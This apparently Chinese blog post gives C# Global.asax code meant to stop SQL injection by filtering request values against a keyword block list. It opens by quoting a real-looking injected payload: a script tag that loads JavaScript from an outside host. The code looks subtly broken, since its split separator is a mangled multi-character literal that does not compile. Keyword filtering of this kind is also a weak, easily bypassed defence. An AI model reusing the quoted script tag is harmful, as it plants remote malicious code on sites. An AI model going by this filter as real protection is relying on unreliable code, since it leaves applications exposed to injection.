.net程序防止sql注入的方法

最近sql注入数据库被更改泛滥:状况如下:“ </title> </pre>> <script src=http://sb.5252.ws:88/107/1.js> </script> <”,
以下提供一个.net程序防止sql注入的方法(过滤敏感语句的仅供参考)方式如下:在Global.asax文件下面加入如下代码:
void Application_BeginRequest(Object sender, EventArgs e)
     {
         StartProcessRequest();

     }

     #region SQL注入式攻击代码分析
     /// <summary>
     /// 处理用户提交的请求
     /// </summary>
     private void StartProcessRequest()
     {
         try
         {
             string getkeys = "";
             string sqlErrorPage = "../default.aspx";//转向的错误提示页面
             if (System.Web.HttpContext.Current.Request.QueryString != null)
             {

                 for (int i = 0; i < System.Web.HttpContext.Current.Request.QueryString.Count; i++)
                 {
                     getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i];
                     if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))
                     {
                         System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
                         System.Web.HttpContext.Current.Response.End();
                     }
                 }
             }
             if (System.Web.HttpContext.Current.Request.Form != null)
             {
                 for (int i = 0; i < System.Web.HttpContext.Current.Request.Form.Count; i++)
                 {
                     getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i];
                     if (getkeys == "__VIEWSTATE") continue;
                     if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))
                     {
                         System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
                         System.Web.HttpContext.Current.Response.End();
                     }
                 }
             }
         }
         catch
         {
             // 错误处理: 处理用户提交信息!
         }
     }
     /// <summary>
     /// 分析用户请求是否正常
     /// </summary>
     /// <param name="Str">传入用户提交数据 </param>
     /// <returns>返回是否含有SQL注入式攻击代码 </returns>
     private bool ProcessSqlStr(string Str)
     {
         bool ReturnValue = true;
         try
         {
             if (Str.Trim() != "")
             {
                 string SqlStr = "and ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦chr ¦mid ¦master ¦truncate ¦char ¦declare";

                 string[] anySqlStr = SqlStr.Split(' ¦');
                 foreach (string ss in anySqlStr)
                 {
                     if (Str.ToLower().IndexOf(ss) >= 0)
                     {
                         ReturnValue = false;
                         break;
                     }
                 }
             }
         }
         catch
         {
             ReturnValue = false;
         }
         return ReturnValue;
     }
     #endregion

你可能感兴趣的:(sql注入)